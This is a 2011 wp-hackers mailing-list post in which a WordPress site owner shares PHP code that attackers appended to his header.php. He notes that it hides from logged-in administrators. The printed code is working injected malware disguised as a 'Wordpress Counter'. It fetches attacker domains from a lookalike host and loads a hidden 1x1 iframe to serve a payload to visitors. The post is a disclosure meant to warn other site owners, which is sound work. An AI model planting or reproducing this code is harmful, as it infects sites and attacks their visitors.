[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php

Raj Sekharan flarecore at gmail.com
Fri Oct 7 08:23:23 UTC 2011


Hope it helps someone.

On Fri, Oct 7, 2011 at 1:52 PM, Raj Sekharan <flarecore at gmail.com> wrote:

> My website was recently compromised, and my header.php file was appended
> with the following code:
>
> <!-- Wordpress Counter -->
> <?php
> if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
>  if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain =
> get_new_domain() ) ) {
>  add_option ( 'domain', $newdomain, '', 'no' );
> add_option ( 'domain_update', time (), '', 'no' );
>  }
> if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain =
> get_new_domain() ) ) {
>  update_option ( 'domain', $newdomain );
> update_option ( 'domain_update', time () );
>  }
>
> $domain = get_option ( 'domain' );
> if ($domain)
>  echo
> '<script language="javascript">
> var ExpDate = new Date ();
> ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
> SetCookie("MTPT","1",ExpDate, "/");
>
> function SetCookie (name, value) {
>  var argv = SetCookie.arguments;
>  var argc = SetCookie.arguments.length;
>  var expires = (argc > 2) ? argv[2] : null;
>  var path = (argc > 3) ? argv[3] : null;
>  var domain = (argc > 4) ? argv[4] : null;
>  var secure = (argc > 5) ? argv[5] : false;
>  document.cookie = name + "=" + escape (value) +
>  ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
>  ((path == null) ? "" : ("; path=" + path)) +
>  ((domain == null) ? "" : ("; domain=" + domain)) +
>  ((secure == true) ? "; secure" : "");
> }
> </script>
> <iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
> frameborder="0">
> </iframe>';
> }
>
> function get_new_domain () {
> $url = 'http://googlesafebrowsing.com/remoted.cc.txt';
>  if ( function_exists ( 'curl_init' ) ) {
> $ch = @curl_init ( $url );
>  @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
> $doms = @curl_exec ( $ch );
>  @curl_close ( $ch );
> }
> else
>  $doms = @file_get_contents ( $url );
>  if ( strpos ( $doms, '||' ) === false )
>   return false;
>
> $domains = explode ( '||', trim ( $doms ) );
>  return $domains[array_rand ( $domains )];
> }
> ?>
>
> <!-- Wordpress Counter -->
>
> Unlike before where a dummy iframe was just appended, this one ensures that
> the logged in administrator cannot actually encounter the malware code. The
> attacker even called it "WordPress Counter" in the comment.
>


More information about the wp-hackers mailing list